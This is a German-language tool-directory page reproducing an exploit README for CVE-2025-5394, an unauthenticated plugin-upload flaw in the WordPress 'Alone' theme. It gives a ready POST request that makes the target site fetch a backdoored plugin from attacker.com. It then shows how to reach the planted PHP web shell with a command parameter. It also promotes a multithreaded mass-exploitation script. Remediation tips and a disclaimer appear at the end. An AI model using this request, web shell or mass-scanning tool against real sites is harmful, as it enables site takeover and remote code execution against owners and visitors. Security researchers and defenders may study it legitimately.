Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-5394 — Alone – Wohltätigkeits-Multipurpose-Nonprofit-WordPress-Theme <= 7.8.3 – Fehlende Autorisierung zu nicht authentifiziertem beliebigen Dateiupload via Plugin-Installation | Kitploit
Tools/GitHubGitHub/yucaerin/cve-2025-5394
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubyucaerin/cve-2025-5394

CVE-2025-5394

Alone – Wohltätigkeits-Multipurpose-Nonprofit-WordPress-Theme <= 7.8.3 – Fehlende Autorisierung zu nicht authentifiziertem beliebigen Dateiupload via Plugin-Installation

Repository anzeigen
131vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-5394 – WordPress Alone Theme <= 7.8.3 - Nicht authentifiziertes willkürliches Hochladen von Dateien über Plugin-Installation

🔥 Zusammenfassung der Sicherheitslücke
Das WordPress-Theme Alone in Versionen <= 7.8.3 ist anfällig für eine nicht authentifizierte willkürliche Datei-Upload-Sicherheitslücke. Dieser Fehler ermöglicht es nicht authentifizierten Angreifern, beliebige Plugin-ZIP-Dateien von entfernten URLs über einen ungeschützten AJAX-Endpunkt hochzuladen und zu installieren – was zu Remote Code Execution (RCE) durch das Bereitstellen von hintertürten Plugins führt.

Diese Sicherheitslücke resultiert aus der Funktion beplus_import_pack_install_plugin, die über wp_ajax_nopriv_ ohne Authentifizierungs- oder Berechtigungsprüfungen öffentlich zugänglich gemacht wird. Die Funktion installiert und aktiviert ein Plugin von einer vom Benutzer bereitgestellten URL.

🔍 Betroffenes Theme

  • Theme-Name: Alone – Charity Multipurpose Non-profit WordPress Theme
  • Betroffene Version: <= 7.8.3
  • Sicherheitslückentyp: Nicht authentifiziertes willkürliches Hochladen von Dateien → RCE
  • CVE-ID: CVE-2025-5394
  • CVSS-Score: 9.8 (Kritisch)
  • Auswirkung: Vollständige Remote Code Execution (RCE) und vollständige Kompromittierung der Website

🧪 Exploit-Funktionen

  • 🔓 Keine Authentifizierung erforderlich
  • 📦 Lädt bösartiges Plugin-ZIP direkt von einer entfernten URL hoch
  • 🚀 Installiert und aktiviert das Plugin automatisch
  • 🐚 Webshell-Auslieferung unterstützt über eingebettetes PHP im Plugin
  • ✅ AJAX-Endpunkt für nicht authentifizierte Benutzer zugänglich: /wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin

🧠 Forscher

  • Credit: Thai An

🚀 Verwendung

  1. Bereiten Sie eine bösartige Plugin-ZIP-Datei vor, die auf einem von Ihnen kontrollierten Server gehostet wird.

    • Muss einen gültigen Plugin-Header (Plugin Name:) und eine PHP-Hintertür (z. B. bk.php) enthalten.
  2. Erstellen Sie die folgende POST-Anfrage:

    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: victim.com
    Content-Type: application/x-www-form-urlencoded
    
    action=beplus_import_pack_install_plugin&
    data[plugin_slug]=hello-dolly&
    data[plugin_source]=https://attacker.com/hello-dolly.zip
    
  3. Bei Erfolg wird das Plugin installiert und aktiviert. Greifen Sie auf Ihre Shell zu unter:

    root@kitploit:~
    https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
    

🧰 Massen-Exploit-Skript Dieses Repository enthält ein Massen-Exploit-Tool mit:

  • Multithread-Verarbeitung
  • Automatischem HTTPS-Präfix (falls fehlend)
  • Live-Protokollierung erfolgreicher Ziele in result.txt

Siehe mass_beplus_exploit.py für Details.

🛠 Empfehlungen zur Behebung

  • Theme-Autoren sollten den Hook wp_ajax_nopriv_beplus_import_pack_install_plugin entfernen oder absichern.
  • Implementieren Sie Authentifizierungs-/Berechtigungsprüfungen (z. B. current_user_can('install_plugins'))
  • Validieren und beschränken Sie Plugin-Quellen.
  • Verwenden Sie eine Web Application Firewall (WAF), um unbefugten admin-ajax-Zugriff zu blockieren.

🔒 Haftungsausschluss:
Diese Informationen werden ausschließlich zu Bildungs- und autorisierten Sicherheitstestzwecken bereitgestellt. Unbefugter Zugriff oder unbefugte Nutzung von Computersystemen ist illegal und unethisch.

📚 Referenz:

  • Wordfence Advisory – CVE-2025-5394

CVE: CVE-2025-5394
Researcher: Thai An

Tool herunterladen